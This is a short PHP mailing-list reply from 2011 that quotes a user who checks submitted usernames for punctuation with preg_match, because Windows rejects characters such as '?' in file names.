>> To unsubscribe, visit: http://www.php.net/unsub.php
>>
>>
>
Re: [PHP] Re:
No problem ;)
Regards,
Igor Escobar
*Software Engineer
*
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar <http://www.twitter.com/igorescobar>
On Thu, Sep 22, 2011 at 1:25 PM, Eric wrote:
> Thanks Very much I used,
> preg_match('/[[:punct:]]/', $_POST['username']) !== 0
> and it works without errors. The reason I can't just use
> is_file which I wish I could is because windows doesn't allow question
> marks
> or some wierd character. It decides to not allow php to make the file if
> there
> are odd ball characters. It is a very unfortunate mistake in my code that
> I
> wish php would ignore and just make the file "?".
